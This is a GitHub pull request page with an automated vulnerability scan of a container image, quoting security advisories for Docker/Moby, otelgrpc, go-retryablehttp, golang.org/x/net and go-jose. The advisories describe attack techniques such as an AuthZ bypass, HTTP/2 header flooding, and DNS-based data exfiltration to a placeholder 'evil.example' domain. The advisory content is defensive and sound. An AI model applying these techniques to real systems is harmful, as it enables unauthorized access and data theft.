-
Notifications
You must be signed in to change notification settings - Fork 3
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Added custom releases to fix (missing) versioning #6336
Conversation
🔍 Vulnerabilities of
|
digest | sha256:b112fbce1ef4927c90e9b7b7295c849769b05595061c7631d07f95e62bb1d209 |
vulnerabilities | |
platform | linux/amd64 |
size | 36 MB |
packages | 309 |
github.com/docker/docker
|
Affected range | >=24.0.0 |
Fixed version | 26.1.4 |
CVSS Score | 9.9 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Description
A security vulnerability has been detected in certain versions of Docker Engine, which could allow an attacker to bypass authorization plugins (AuthZ) under specific circumstances. The base likelihood of this being exploited is low. This advisory outlines the issue, identifies the affected versions, and provides remediation steps for impacted users.
Impact
Using a specially-crafted API request, an Engine API client could make the daemon forward the request or response to an authorization plugin without the body. In certain circumstances, the authorization plugin may allow a request which it would have otherwise denied if the body had been forwarded to it.
A security issue was discovered In 2018, where an attacker could bypass AuthZ plugins using a specially crafted API request. This could lead to unauthorized actions, including privilege escalation. Although this issue was fixed in Docker Engine v18.09.1 in January 2019, the fix was not carried forward to later major versions, resulting in a regression. Anyone who depends on authorization plugins that introspect the request and/or response body to make access control decisions is potentially impacted.
Docker EE v19.03.x and all versions of Mirantis Container Runtime are not vulnerable.
Vulnerability details
- AuthZ bypass and privilege escalation: An attacker could exploit a bypass using an API request with Content-Length set to 0, causing the Docker daemon to forward the request without the body to the AuthZ plugin, which might approve the request incorrectly.
- Initial fix: The issue was fixed in Docker Engine v18.09.1 January 2019..
- Regression: The fix was not included in Docker Engine v19.03 or newer versions. This was identified in April 2024 and patches were released for the affected versions on July 23, 2024. The issue was assigned CVE-2024-41110.
Patches
- docker-ce v27.1.1 containes patches to fix the vulnerability.
- Patches have also been merged into the master, 19.0, 20.0, 23.0, 24.0, 25.0, 26.0, and 26.1 release branches.
Remediation steps
- If you are running an affected version, update to the most recent patched version.
- Mitigation if unable to update immediately:
- Avoid using AuthZ plugins.
- Restrict access to the Docker API to trusted parties, following the principle of least privilege.
References
Incorrect Resource Transfer Between Spheres
Affected range | >=25.0.0 |
Fixed version | 25.0.5 |
CVSS Score | 5.9 |
CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N |
Description
Moby is an open source container framework originally developed by Docker Inc. as Docker. It is a key component of Docker Engine, Docker Desktop, and other distributions of container tooling or runtimes. As a batteries-included container runtime, Moby comes with a built-in networking implementation that enables communication between containers, and between containers and external resources.
Moby's networking implementation allows for creating and using many networks, each with their own subnet and gateway. This feature is frequently referred to as custom networks, as each network can have a different driver, set of parameters, and thus behaviors. When creating a network, the
--internal
flag is used to designate a network as internal. Theinternal
attribute in a docker-compose.yml file may also be used to mark a network internal, and other API clients may specify theinternal
parameter as well.When containers with networking are created, they are assigned unique network interfaces and IP addresses (typically from a non-routable RFC 1918 subnet). The root network namespace (hereafter referred to as the 'host') serves as a router for non-internal networks, with a gateway IP that provides SNAT/DNAT to/from container IPs.
Containers on an internal network may communicate between each other, but are precluded from communicating with any networks the host has access to (LAN or WAN) as no default route is configured, and firewall rules are set up to drop all outgoing traffic. Communication with the gateway IP address (and thus appropriately configured host services) is possible, and the host may communicate with any container IP directly.
In addition to configuring the Linux kernel's various networking features to enable container networking,
dockerd
directly provides some services to container networks. Principal among these is serving as a resolver, enabling service discovery (looking up other containers on the network by name), and resolution of names from an upstream resolver.When a DNS request for a name that does not correspond to a container is received, the request is forwarded to the configured upstream resolver (by default, the host's configured resolver). This request is made from the container network namespace: the level of access and routing of traffic is the same as if the request was made by the container itself.
As a consequence of this design, containers solely attached to internal network(s) will be unable to resolve names using the upstream resolver, as the container itself is unable to communicate with that nameserver. Only the names of containers also attached to the internal network are able to be resolved.
Many systems will run a local forwarding DNS resolver, typically present on a loopback address (
127.0.0.0/8
), such as systemd-resolved or dnsmasq. Common loopback address examples include127.0.0.1
or127.0.0.53
. As the host and any containers have separate loopback devices, a consequence of the design described above is that containers are unable to resolve names from the host's configured resolver, as they cannot reach these addresses on the host loopback device.To bridge this gap, and to allow containers to properly resolve names even when a local forwarding resolver is used on a loopback address,
dockerd
will detect this scenario and instead forward DNS requests from the host/root network namespace. The loopback resolver will then forward the requests to its configured upstream resolvers, as expected.Impact
Because
dockerd
will forward DNS requests to the host loopback device, bypassing the container network namespace's normal routing semantics entirely, internal networks can unexpectedly forward DNS requests to an external nameserver.By registering a domain for which they control the authoritative nameservers, an attacker could arrange for a compromised container to exfiltrate data by encoding it in DNS queries that will eventually be answered by their nameservers. For example, if the domain
evil.example
was registered, the authoritative nameserver(s) for that domain could (eventually and indirectly) receive a request forthis-is-a-secret.evil.example
.Docker Desktop is not affected, as Docker Desktop always runs an internal resolver on a RFC 1918 address.
Patches
Moby releases 26.0.0-rc3, 25.0.5 (released) and 23.0.11 (to be released) are patched to prevent forwarding DNS requests from internal networks.
Workarounds
- Run containers intended to be solely attached to internal networks with a custom upstream address (
--dns
argument todocker run
, or API equivalent), which will force all upstream DNS queries to be resolved from the container network namespace.Background
- yair zak originally reported this issue to the Docker security team.
- PR libnet: Don't forward to upstream resolvers on internal nw moby/moby#46609 was opened in public to fix this issue, as it was not originally considered to have a security implication.
- The official documentation claims that "the
--internal
flag that will completely isolate containers on a network from any communications external to that network," which necessitated this advisory and CVE.
go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc 0.45.0
(golang)
pkg:golang/go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc@0.45.0
Allocation of Resources Without Limits or Throttling
Affected range | <0.46.0 |
Fixed version | 0.46.0 |
CVSS Score | 7.5 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Description
Summary
The grpc Unary Server Interceptor opentelemetry-go-contrib/instrumentation/google.golang.org/grpc/otelgrpc/interceptor.go
// UnaryServerInterceptor returns a grpc.UnaryServerInterceptor suitable // for use in a grpc.NewServer call. func UnaryServerInterceptor(opts ...Option) grpc.UnaryServerInterceptor {
out of the box adds labels
net.peer.sock.addr
net.peer.sock.port
that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent.
Details
An attacker can easily flood the peer address and port for requests.
PoC
Apply the attached patch to the example and run the client multiple times. Observe how each request will create a unique histogram and how the memory consumption increases during it.
Impact
In order to be affected, the program has to configure a metrics pipeline, use UnaryServerInterceptor, and does not filter any client IP address and ports via middleware or proxies, etc.
Others
It is similar to already reported vulnerabilities.
- GHSA-5r5m-65gx-7vrh (open-telemetry/opentelemetry-go-contrib)
- GHSA-cg3q-j54f-5p7p (prometheus/client_golang)
Workaround for affected versions
As a workaround to stop being affected, a view removing the attributes can be used.
The other possibility is to disable grpc metrics instrumentation by passing
otelgrpc.WithMeterProvider
option withnoop.NewMeterProvider
.Solution provided by upgrading
In PR #4322, to be released with v0.46.0, the attributes were removed.
References
github.com/hashicorp/go-retryablehttp 0.7.4
(golang)
pkg:golang/github.com/hashicorp/go-retryablehttp@0.7.4
Insertion of Sensitive Information into Log File
Affected range | <0.7.7 |
Fixed version | 0.7.7 |
CVSS Score | 6 |
CVSS Vector | CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N |
Description
go-retryablehttp prior to 0.7.7 did not sanitize urls when writing them to its log file. This could lead to go-retryablehttp writing sensitive HTTP basic auth credentials to its log file. This vulnerability, CVE-2024-6104, was fixed in go-retryablehttp 0.7.7.
golang.org/x/net 0.17.0
(golang)
pkg:golang/golang.org/x/net@0.17.0
Uncontrolled Resource Consumption
Affected range | <0.23.0 |
Fixed version | 0.23.0 |
CVSS Score | 5.3 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
Description
An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request's headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection.
gopkg.in/square/go-jose.v2 2.6.0
(golang)
pkg:golang/gopkg.in/square/go-jose.v2@2.6.0
Improper Handling of Highly Compressed Data (Data Amplification)
Affected range | <=2.6.0 |
Fixed version | Not Fixed |
CVSS Score | 4.3 |
CVSS Vector | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L |
Description
Impact
An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). Thanks to Enze Wang@Alioth and Jianjun Chen@Zhongguancun Lab (@zer0yu and @chenjj) for reporting.
Patches
The problem is fixed in the following packages and versions:
- github.com/go-jose/go-jose/v4 version 4.0.1
- github.com/go-jose/go-jose/v3 version 3.0.3
- gopkg.in/go-jose/go-jose.v2 version 2.6.3
The problem will not be fixed in the following package because the package is archived:
- gopkg.in/square/go-jose.v2
Attempting automerge. See https://github.com/uniget-org/tools/actions/runs/10249361146. |
No description provided.